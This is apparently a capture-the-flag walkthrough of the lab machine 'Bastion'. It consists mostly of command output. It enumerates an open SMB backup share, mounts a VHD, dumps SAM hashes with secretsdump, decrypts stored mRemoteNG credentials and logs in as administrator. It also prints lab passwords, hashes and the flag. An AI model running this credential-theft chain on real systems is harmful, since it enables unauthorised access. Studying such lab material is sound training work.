Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -p- -A -Pn 10.129.136.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:17 EST
Warning: 10.129.136.29 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.136.29
Host is up (0.73s latency).
Not shown: 65492 closed tcp ports (conn-refused), 30 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-19T20:20:59+01:00
|_clock-skew: mean: -19m59s, deviation: 34m35s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-19T19:20:55
|_ start_date: 2024-01-19T18:11:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3808.35 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn 10.129.136.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:19 EST
Nmap scan report for 10.129.136.29
Host is up (0.47s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 63.98 seconds
SMB
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.129.136.29\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.136.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/WPE/Bastion]
└─$ smbclient \\\\10.129.136.29\\Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
get
5638911 blocks of size 4096. 1175684 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> cd ..
smb: \> pwd
Current directory is \\10.129.136.29\Backups\
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> mget *
Get file note.txt?
Get file SDT65CB.tmp?
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \WindowsImageBackup\L4mpje-PC\>
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175557 blocks available
Note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
Mount my share to the machine’s Backup
┌──(kali㉿kali)-[/mnt/remote]
└─$ sudo mount -t cifs -o 'rw,username=guest' //10.129.136.29/Backups /mnt/remote
Password for guest@//10.129.136.29/Backups:
sudo guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v
Copy SAM, SECURITY and SYSTEM from Windows\System32\config, paste it into my folder
Open terminal as root and run secretsdump
┌──(root㉿kali)-[/home/kali/WPE/Bastion]
└─# secretsdump.py -system SYSTEM -sam SAM -security SECURITY local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
Credential > SSH
┌──(kali㉿kali)-[~]
└─$ ssh l4mpje@10.129.136.29
The authenticity of host '10.129.136.29 (10.129.136.29)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.29' (ED25519) to the list of known hosts.
l4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
https://github.com/haseebT/mRemoteNG-Decrypt
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of c:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.811.198.464 bytes free
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine
="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/t
wXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4
-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw
5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession=
"Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncr
yptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTim
eout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" D
isplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="fa
lse" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" Re
directSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connect
ed="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" V
NCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0"
VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewO
nly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes"
RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors
="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" Inher
itEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIco
n="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" Inh
eritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirect
Ports="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="
false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUse
ConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false
" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTi
meout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="fals
e" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false"
InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyTyp
e="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" Inheri
tVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly=
"false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnec
tionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGat
ewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e6
8e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kY
e4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Defa
ult Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptio
nStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout=
"false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" Displa
yWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false"
CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" Redirec
tSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="f
alse" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEnc
oding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCPr
oxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="
false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGat
ewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="fal
se" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEna
bleFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="fa
lse" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritP
uttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts
="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false
" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConso
leSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" Inh
eritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout
="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" In
heritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" Inher
itVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="fa
lse" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCP
roxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="fals
e" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionC
redentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayD
omain="false" />
</mrng:Connections>
Escalating Privilege
┌──(kali㉿kali)-[/opt/mRemoteNG-Decrypt]
└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAow
Password: thXLHM96BeKL0ER2
Get rid of the empty spaces
SSH as admin
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\Administrator\Desktop
23-02-2019 09:40 <DIR> .
23-02-2019 09:40 <DIR> ..
19-01-2024 19:12 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4.811.132.928 bytes free
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
5bb71734a3a10e20b395ad114232c71e